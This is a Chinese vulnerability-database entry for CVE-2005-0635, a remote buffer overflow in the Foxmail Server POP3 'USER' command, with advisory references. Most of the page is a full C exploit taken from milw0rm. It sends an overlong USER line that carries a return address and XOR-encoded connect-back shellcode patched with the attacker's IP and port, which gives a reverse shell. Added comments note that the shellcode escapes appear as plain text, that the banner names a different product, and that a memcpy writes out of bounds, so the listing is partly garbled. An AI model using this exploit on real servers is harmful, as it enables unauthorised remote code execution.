Foxmail Server “USER”命令处理多个远程缓冲区溢出漏洞
漏洞ID | 1108498 | 漏洞类型 | 缓冲区溢出 |
发布时间 | 2005-03-02 | 更新时间 | 2005-10-20 |
CVE编号 | CVE-2005-0635 |
CNNVD-ID | CNNVD-200505-589 |
漏洞平台 | Windows | CVSS评分 | 10.0 |
|漏洞来源
|漏洞详情
Foxmail Server 是 Windows 和 Linux 下都可以使用的邮件服务程序。Foxmail Server 对特定命令的参数处理存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。
|漏洞EXP
#include <winsock.h>
#include <windows.h>
#include <stdio.h>
#include <conio.h>
#pragma comment (lib,"ws2_32")
/* Byte offsets inside Shellcode[] that main() overwrites with the
 * connect-back port (2 bytes) and IP (4 bytes) via memcpy. */
#define PORT_OFFSET 118
#define IP_OFFSET 111
/* Payload appended to the oversized USER line in main().
 * NOTE(review): as reproduced on this page the escape sequences appear as
 * plain text ("xEB", "x10", ...), so sizeof(Shellcode) in main() measures
 * that text, not a binary payload; reproduced as given. */
char Shellcode[] = "xEBx10x5Bx4Bx33xC9x66xB9x25x01x80x34x0Bx99xE2xFA"
"xEBx05xE8xEBxFFxFFxFF"
"x70x62x99x99x99xC6xFDx38xA9x99x99x99x12xD9x95x12"
"xE9x85x34x12xF1x91x12x6ExF3x9DxC0x71x02x99x99x99"
"x7Bx60xF1xAAxABx99x99xF1xEExEAxABxC6xCDx66x8Fx12"
"x71xF3x9DxC0x71x1Bx99x99x99x7Bx60x18x75x09x98x99"
"x99xCDxF1x98x98x99x99x66xCFx89xC9xC9xC9xC9xD9xC9"
"xD9xC9x66xCFx8Dx12x41xF1xE6x99x99x98xF1x9Bx99x99"
"xACx12x55xF3x89xC8xCAx66xCFx81x1Cx59xECxD3xF1xFA"
"xF4xFDx99x10xFFxA9x1Ax75xCDx14xA5xBDxF3x8CxC0x32"
"x7Bx64x5FxDDxBDx89xDDx67xDDxBDxA4x10xC5xBDxD1x10"
"xC5xBDxD5x10xC5xBDxC9x14xDDxBDx89xCDxC9xC8xC8xC8"
"xF3x98xC8xC8x66xEFxA9xC8x66xCFx9Dx12x55xF3x66x66"
"xA8x66xCFx91xCAx66xCFx85x66xCFx95xC8xCFx12xDCxA5"
"x12xCDxB1xE1x9Ax4CxCBx12xEBxB9x9Ax6CxAAx50xD0xD8"
"x34x9Ax5CxAAx42x96x27x89xA3x4FxEDx91x58x52x94x9A"
"x43xD9x72x68xA2x86xECx7ExC3x12xC3xBDx9Ax44xFFx12"
"x95xD2x12xC3x85x9Ax44x12x9Dx12x9Ax5Cx32xC7xC0x5A"
"x71x99x66x66x66x17xD7x97x75xEBx67x2Ax8Fx34x40x9C"
"x57xE7x41x7BxEAx52x74x65xA2x40x90x6Cx34x75x60x33"
"xF9x7ExE0x5FxE0";
/* Oversized POP3 "user" line: the overlong argument that the advisory
 * describes as overflowing the server's buffer. main() overwrites this
 * array in place starting at byte offset 244. The line is roughly 1.2 KB
 * by count; the trailing "rn" is reproduced as it appears on the page
 * (the server-side check that should bound this argument is the missing
 * control the CVE describes). */
char szUser[] = "user 1231231231231234567890abcdefghijklmnopqrstuvwxyz1234567890a"
"bcdefghijklmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz123"
"4567890abcdefghijklmnopqrstuvwxyz1234567890abcdefghijkklmnopqrst"
"uvwxyz1234567890abcdefghijkklmnopqrstuvwxyz1234567890abcdAAAAijk"
"lmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz1234567890abc"
"defghijklmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz12345"
"67890abcdefghijklmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvw"
"xyz1234567890abcdefghijklmnopqrstuvwxyz1234567890abcdefghijklmno"
"pqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz1234567890abcdefg"
"hijklmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz123456789"
"0abcdefghijklmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz1"
"234567890abcdefghijklmnopqrstuvwxyz1234567890abcdefghijklmnopqrs"
"tuvwxyz1234567890abcdefghijklmnopqrstuvwxyz1234567890abcdefghijk"
"lmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz1234567890abc"
"defghijklmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz12345"
"67890abcdefghijklmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvw"
"xyz1234567890abcdefghijklmnopqrstuvwxyz1234567890abcdefghijklmno"
"pqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz1234567890abcdefg"
"hijklmnopqrstuvwxyzrn";
/* POP3 "pass" line sent after the USER line (see main()). */
unsigned char szPass[] = "pass siglosrn";
/* Print usage text for `program` and terminate the process.
 *
 * Never returns (calls exit(0)). Note that exit() is used although
 * <stdlib.h> is not included above, so it relies on an implicit
 * declaration. The banner names "Aerofox Mail Server 1.1.0.1 POP3 Temp
 * Dir Stack Overflow", which differs from this page's advisory title
 * (Foxmail Server "USER" command); reproduced as given. The literal "rn"
 * sequences appear as plain text on this page. */
void help(char *program)
{
printf ("========================================================rn");
printf ("Aerofox Mail Server 1.1.0.1 POP3 Temp Dir Stack Overflowrn");
printf ("========================================================rnrn");
printf ("Usage: %s <Host> <Your IP> <Your port>rn", program);
printf ("e.g.:rn");
printf (" %s 127.0.0.1 202.119.9.42 8111rn", program);
printf ("rn The ret address is 0x7ffa1571.rn");
exit(0);
}
/* Open a TCP connection to u_host:u_port and return the connected socket.
 *
 * Returns -1 (converted to SOCKET) when Winsock start-up, name resolution
 * or socket creation fails. A failed connect() does not return at all: it
 * prints a message and calls exit(-1) without closesocket()/WSACleanup().
 * On the two resolution/creation failure paths WSAStartup has already
 * succeeded and is not undone here.
 *
 * Side effects: calls WSAStartup() on every invocation (the matching
 * WSACleanup() lives in Disconnect()). The setsockopt() return value is
 * ignored, so a receive timeout may silently not be applied. */
SOCKET Connect(char *u_host ,unsigned short u_port)
{
WSADATA wsaData;
SOCKET sock;
struct hostent *r;
struct sockaddr_in r_addr;
int timeout = 1000; /* SO_RCVTIMEO value; assumed milliseconds on Winsock */
if(WSAStartup(0x0101,&wsaData) != 0)
{
printf("error starting winsock..");
return -1;
}
if((r=gethostbyname(u_host))== NULL)
{
return -1 ;
}
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))== INVALID_SOCKET)
{
return -1 ;
}
/* r_addr is not zeroed; only the three fields below are set. */
r_addr.sin_family=AF_INET;
r_addr.sin_port=htons(u_port);
/* Takes the first resolved address and assumes it is IPv4 (h_addr is
 * read as a struct in_addr without checking h_addrtype/h_length). */
r_addr.sin_addr=*((struct in_addr*)r->h_addr);
if(connect(sock,(struct sockaddr *)&r_addr,sizeof(r_addr))==SOCKET_ERROR)
{
printf("Can't connectn");
exit(-1);
}
setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, (char*)&timeout,sizeof(timeout));
return(sock);
}
/* Close socket s and tear down Winsock (pairs with the WSAStartup() done
 * in Connect()). Return values of both calls are ignored. */
void Disconnect(SOCKET s)
{
closesocket(s);
WSACleanup();
}
/* Receive one chunk from s into a 1500-byte buffer and print it as a
 * string.
 *
 * The recv() return value is not checked: on timeout or error the
 * zero-filled buffer is printed as an empty line. If recv() fills all
 * 1500 bytes there is no NUL terminator left, and printf("%s") reads
 * past the end of buff. */
void tr(SOCKET s)
{
char buff[1500];
memset(buff, 0, sizeof(buff));
recv(s, buff, sizeof(buff), 0);
printf("%srn",buff);
}
/* Send the NUL-terminated string buf over s one byte at a time, pausing
 * p (Sleep() units, i.e. milliseconds) before each byte and echoing the
 * byte to stdout.
 *
 * Stops at the first NUL in buf, so embedded zero bytes end the
 * transmission early. strlen(buf) is re-evaluated on every iteration, and
 * the send() return value is ignored. The commented-out lines kept below
 * are the earlier whole-buffer variant. */
void SlowSend(SOCKET s, char *buf, int p)
{
//send(s, buf, sizeof(buf),0);
//send(s, "rn", 2,0);
for(unsigned int i = 0; i < strlen(buf); i++)
{
Sleep(p);
printf("%c", buf[i]);
send(s, (char*)&(buf[i]), 1, 0);
}
}
/* Entry point. Arguments: argv[1] target host, argv[2] connect-back IP,
 * argv[3] connect-back port (see help()).
 *
 * `void main` is non-standard; the portable signature is `int main`.
 * atoi()/inet_addr() results are used unchecked, and the SOCKET returned
 * by Connect() is used without testing for its -1 failure value.
 *
 * The three memcpy() calls below write into the global szUser array at
 * fixed offsets (244, 252, 269) with no check against sizeof szUser. By my
 * count of the string literals as printed on this page (szUser about 1173
 * characters, Shellcode about 948), the third copy runs past the end of
 * szUser - an out-of-bounds write in this program itself; TODO confirm
 * against the actual string lengths. */
void main(int argc, char *argv[])
{
/*_asm{
mov eax,90909091h
dec eax
a: dec ebx
cmp [ebx], eax
jnz a
push ebx
ret
}*/
if(argc != 4)
help(argv[0]);
unsigned short port;
unsigned long ip;
/* Port and IP are XOR-masked with 0x9999 / 0x99999999 before being
 * patched into Shellcode at PORT_OFFSET / IP_OFFSET; presumably the
 * payload unmasks them at run time - not verifiable from this listing. */
port = htons(atoi(argv[3]))^(USHORT)0x9999;
ip = inet_addr(argv[2])^(ULONG)0x99999999;
memcpy(&Shellcode[PORT_OFFSET], &port, 2);
memcpy(&Shellcode[IP_OFFSET], &ip, 4);
/* 110 = POP3. tr() prints the server greeting. */
SOCKET s = Connect(argv[1], 110);
tr(s);
/* In-place patching of the USER line; no bounds checks (see header). */
memcpy(szUser + 244, "xCCx90xEBx04x71x15xFAx7F", 8);
memcpy(szUser + 244 + 8, "xB8x91x90x90x90x48x4Bx39x03x75xFBx53xC3x90x90x90x90", 17);
memcpy(szUser + 244 + 8 + 17, Shellcode, sizeof(Shellcode) - 1);
SlowSend(s, (char*)szUser, 1);
/* Blocks until a key is pressed before the PASS line is sent. */
getch();
tr(s);
SlowSend(s, (char*)szPass, 100);
tr(s);
Disconnect(s);
return;
}
// milw0rm.com [2005-03-02]
|参考资料
来源:BID
名称:12711
链接:http://www.securityfocus.com/bid/12711
来源:BUGTRAQ
名称:20050302 Foxmail server "USER" command Multiple remote buffer overflow
链接:http://www.securityfocus.com/archive/1/391960
来源:SECTRACK
名称:1013356
链接:http://securitytracker.com/id?1013356
来源:SECUNIA
名称:14145
链接:http://secunia.com/advisories/14145